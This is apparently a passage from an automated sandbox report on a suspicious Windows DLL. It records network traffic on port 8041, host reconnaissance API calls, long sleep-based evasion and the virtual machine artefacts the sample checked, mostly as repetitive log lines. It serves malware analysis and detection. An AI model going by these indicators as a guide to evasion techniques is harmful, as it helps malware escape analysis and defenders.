                  Source: vierm_soft_x64.dll.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                  Source: vierm_soft_x64.dll.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                  Source: vierm_soft_x64.dll.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                  Source: vierm_soft_x64.dll.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                  Source: vierm_soft_x64.dll.dll Static PE information: real checksum: 0x81152 should be: 0xbc113
                  Source: vierm_soft_x64.dll.dll Static PE information: section name: memcpy_
                  Source: vierm_soft_x64.dll.dll Static PE information: section name: _RDATA
                  Source: C:\Windows\System32\rundll32.exe Code function: 23_3_0000029F3B7A00D8 push cs; retf 23_3_0000029F3B7A00FD
                  Source: C:\Windows\explorer.exe Code function: 30_2_089DEE21 push rsi; ret 30_2_089DEE27
                  Source: C:\Windows\explorer.exe Code function: 30_2_089DF5BA push rcx; ret 30_2_089DF5BC
                  Source: C:\Windows\explorer.exe Code function: 30_2_089DEF4F push D5912897h; iretq 30_2_089DEF57

                  Hooking and other Techniques for Hiding and Protection

                  Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 49718
                  Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 49719
                  Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 49724
                  Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 49725
                  Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 49731
                  Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 49732
                  Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 49735
                  Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 49736
                  Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 49738
                  Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 49739
                  Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 49743
                  Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 49744
                  Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 49746
                  Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 49747
                  Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 49750
                  Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 49751
                  Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 49754
                  Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 49755
                  Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 49757
                  Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 49758
                  Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 49760
                  Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 49761
                  Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 49766
                  Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 49767
                  Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 49770
                  Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 49771
                  Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 49775
                  Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 49776
                  Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 49783
                  Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 49785
                  Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 49791
                  Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 49792
                  Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 49796
                  Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 49797
                  Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\System32\rundll32.exe Code function: GetUserNameW,GetComputerNameExW,GetComputerNameExW,GetTokenInformation,GetNativeSystemInfo,GetAdaptersInfo,GetAdaptersInfo,23_2_0000029F3B904D00
                  Source: C:\Windows\explorer.exe Code function: GetAdaptersInfo,GetAdaptersInfo,wsprintfA,wsprintfA,wsprintfA,GetComputerNameExA,wsprintfA,GetComputerNameExA,wsprintfA,30_2_089D8424
                  Source: C:\Windows\explorer.exe Code function: GetAdaptersInfo,GetAdaptersInfo,30_2_089D7274
                  Source: C:\Windows\System32\rundll32.exe Window / User API: threadDelayed 1756
                  Source: C:\Windows\System32\rundll32.exe Window / User API: threadDelayed 8119
                  Source: C:\Windows\explorer.exe Window / User API: threadDelayed 566
                  Source: C:\Windows\explorer.exe Window / User API: threadDelayed 3224
                  Source: C:\Windows\explorer.exe Window / User API: threadDelayed 5848
                  Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 872
                  Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 883
                  Source: C:\Windows\System32\rundll32.exe Check user administrative privileges: GetTokenInformation,DecisionNodes graph_23-19961
                  Source: C:\Windows\System32\loaddll64.exe TID: 1356 Thread sleep time: -120000s >= -30000s
                  Source: C:\Windows\System32\rundll32.exe TID: 7660 Thread sleep count: 1756 > 30
                  Source: C:\Windows\System32\rundll32.exe TID: 7660 Thread sleep time: -105360000s >= -30000s
                  Source: C:\Windows\System32\rundll32.exe TID: 7660 Thread sleep count: 8119 > 30
                  Source: C:\Windows\System32\rundll32.exe TID: 7660 Thread sleep time: -487140000s >= -30000s
                  Source: C:\Windows\explorer.exe TID: 8172 Thread sleep count: 566 > 30
                  Source: C:\Windows\explorer.exe TID: 8172 Thread sleep time: -56600s >= -30000s
                  Source: C:\Windows\explorer.exe TID: 8164 Thread sleep count: 3224 > 30
                  Source: C:\Windows\explorer.exe TID: 8164 Thread sleep time: -3224000s >= -30000s
                  Source: C:\Windows\explorer.exe TID: 8164 Thread sleep count: 5848 > 30
                  Source: C:\Windows\explorer.exe TID: 8164 Thread sleep time: -5848000s >= -30000s
                  Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                  Source: C:\Windows\explorer.exe Code function: 30_2_089DA8E0 FindFirstFileW,FindNextFileW,LoadLibraryW,LoadLibraryExW,30_2_089DA8E0
                  Source: C:\Windows\explorer.exe Code function: 30_2_089D2B28 FindFirstFileA,wsprintfA,FindNextFileA,FindClose,30_2_089D2B28
                  Source: C:\Windows\System32\loaddll64.exe Thread delayed: delay time: 120000
                  Source: C:\Windows\System32\rundll32.exe Thread delayed: delay time: 60000
                  Source: Amcache.hve.9.dr Binary or memory string: VMware
                  Source: Amcache.hve.9.dr Binary or memory string: VMware Virtual USB Mouse
                  Source: Amcache.hve.9.dr Binary or memory string: vmci.syshbin
                  Source: Amcache.hve.9.dr Binary or memory string: VMware, Inc.
                  Source: explorer.exe, 0000001E.00000000.1578935505.000000000888E000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: 2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}=
                  Source: Amcache.hve.9.dr Binary or memory string: VMware20,1hbin@
                  Source: Amcache.hve.9.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                  Source: Amcache.hve.9.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: Amcache.hve.9.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                  Source: explorer.exe, 0000001E.00000000.1578935505.0000000008796000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2586948409.0000000008796000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWe
                  Source: rundll32.exe, 00000017.00000002.2578798813.0000029F3B7FD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000002.2575784572.0000029F39C98000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000000.1578935505.00000000087C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000000.1578935505.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2586948409.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2586948409.00000000087C0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
                  Source: Amcache.hve.9.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: explorer.exe, 0000001E.00000002.2586948409.00000000088E9000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
                  Source: Amcache.hve.9.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                  Source: Amcache.hve.9.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
                  Source: Amcache.hve.9.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: explorer.exe, 0000001E.00000002.2586948409.00000000088E9000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
                  Source: Amcache.hve.9.dr Binary or memory string: vmci.sys
                  Source: Amcache.hve.9.dr Binary or memory string: vmci.syshbin`
                  Source: Amcache.hve.9.dr Binary or memory string: \driver\vmci,\driver\pci
                  Source: explorer.exe, 0000001E.00000003.2292493778.0000000008979000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware SATA CD00`
                  Source: Amcache.hve.9.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: explorer.exe, 0000001E.00000002.2586948409.00000000087C0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: NXTVMWare
                  Source: rundll32.exe, 00000017.00000003.1412218953.0000029F3B8EE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: DisableGuestVmNetworkConnectivity
                  Source: Amcache.hve.9.dr Binary or memory string: VMware20,1
                  Source: Amcache.hve.9.dr Binary or memory string: Microsoft Hyper-V Generation Counter
                  Source: Amcache.hve.9.dr Binary or memory string: NECVMWar VMware SATA CD00
